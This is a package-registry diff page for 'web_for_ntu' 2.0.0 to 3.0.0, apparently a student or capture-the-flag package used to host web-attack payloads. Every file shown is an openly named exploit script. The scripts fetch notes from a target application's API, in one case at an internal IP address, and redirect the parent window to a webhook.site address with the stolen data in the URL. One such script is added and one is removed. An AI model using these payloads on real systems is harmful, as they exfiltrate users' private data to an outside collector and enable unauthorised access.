web_for_ntu 2.0.0 → 3.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (4) hide show
  1. package/exploit_1.js +9 -0
  2. package/exploit_2.js +2 -2
  3. package/package.json +1 -1
  4. package/exploit.js +0 -10
package/exploit_1.js ADDED
@@ -0,0 +1,9 @@
1
+ function leakAllNote() {
2
+ fetch('/api/notes/all')
3
+ .then(response => response.json())
4
+ .then(notes => {
5
+ window.parent.location.href = `https://webhook.site/7b314372-817b-4fbd-a459-8c71d3be3bbd?` + encodeURIComponent(notes[0].id);
6
+ })
7
+ .catch(error => console.error('Error:', error));
8
+ }
9
+ leakAllNote();
package/exploit_2.js CHANGED
@@ -1,4 +1,4 @@
1
- function leakDataFromEndpoint() {
1
+ function leakNoteWithID() {
2
2
  fetch('/api/notes?id=a83ed14e-8c1c-43c3-ad7a-b5393ad85a3d')
3
3
  .then(response => response.json())
4
4
  .then(note => {
@@ -6,4 +6,4 @@ function leakDataFromEndpoint() {
6
6
  })
7
7
  .catch(error => console.error('Error:', error));
8
8
  }
9
- leakDataFromEndpoint();
9
+ leakNoteWithID();
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "web_for_ntu",
3
- "version": "2.0.0",
3
+ "version": "3.0.0",
4
4
  "description": "test1",
5
5
  "main": "exploit.js",
6
6
  "scripts": {
package/exploit.js DELETED
@@ -1,10 +0,0 @@
1
- function leakDataFromEndpoint() {
2
- fetch('http://10.113.184.121:10082/api/notes/all')
3
- .then(response => response.json())
4
- .then(data => {
5
- const queryParams = new URLSearchParams({data: JSON.stringify(data)}).toString();
6
- window.parent.location.href = `https://webhook.site/7b314372-817b-4fbd-a459-8c71d3be3bbd?${queryParams}`;
7
- })
8
- .catch(error => console.error('Error:', error));
9
- }
10
- leakDataFromEndpoint();